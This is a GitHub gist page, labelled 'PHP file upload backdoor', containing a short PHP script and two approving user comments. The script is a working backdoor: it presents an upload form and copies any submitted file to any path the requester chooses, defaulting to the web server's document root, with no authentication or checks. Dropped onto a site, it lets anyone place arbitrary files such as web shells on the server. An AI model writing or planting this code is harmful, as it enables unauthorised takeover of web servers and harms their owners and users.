Skip to content

Instantly share code, notes, and snippets.

@jonaslejon

jonaslejon/file-upload.php

Created February 10, 2016 20:19
Show Gist options
  • Star 12 You must be signed in to star a gist
  • Fork 5 You must be signed in to fork a gist
  • Save jonaslejon/084f1de55c3b3e29ce06 to your computer and use it in GitHub Desktop.
Save jonaslejon/084f1de55c3b3e29ce06 to your computer and use it in GitHub Desktop.
Download ZIP
PHP file upload backdoor
Raw
file-upload.php
<?php
$self = $_SERVER['PHP_SELF'];
$docr = $_SERVER['DOCUMENT_ROOT'];
$sern = $_SERVER['SERVER_NAME'];
$tend = "</tr></form></table><br><br><br><br>";
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
else {$ac = "upload";}
switch($ac) {
case "upload":
echo <<<HTML
<table>
<form enctype="multipart/form-data" action="$self" method="POST">
<input type="hidden" name="ac" value="upload">
<tr>
<input size="5" name="file" type="file"></td>
</tr>
<tr>
<td><input size="10" value="$docr/" name="path" type="text"><input type="submit" value="ОК"></td>
$tend
HTML;
if (isset($_POST['path'])){
$uploadfile = $_POST['path'].$_FILES['file']['name'];
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
echo "File ".$_FILES['file']['name']." uploaded";
} else {
print "Not working: info:\n";
print_r($_FILES);
}
}
break;
}
?>
</pre>
@azizrahaman
Copy link

Thanks

@rmdhfz
Copy link

rmdhfz commented Mar 3, 2021

Thanks, it's power full!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment